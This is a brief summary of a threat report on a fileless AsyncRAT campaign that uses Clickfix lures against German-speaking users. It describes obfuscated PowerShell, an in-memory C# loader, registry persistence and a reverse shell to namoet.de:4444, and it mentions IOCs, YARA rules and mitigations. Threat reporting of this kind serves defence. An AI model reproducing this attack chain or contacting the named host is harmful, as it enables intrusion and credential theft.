Fileless AsyncRAT Distributed Via Clickfix Technique Targeting German Speaking Users

This report describes a targeted, fileless AsyncRAT campaign that uses a Clickfix-themed webpage to trick German-speaking users into executing an obfuscated PowerShell command which downloads a reversed, base64-encoded C# loader compiled in memory (Add-Type). The payload establishes persistence via HKCU registry keys, creates a TCP reverse shell to namoet.de:4444 for remote control and credential theft, provides extensive IOCs and YARA rules for detection, and recommends blocking suspicious PowerShell execution, registry monitoring, and memory scanning.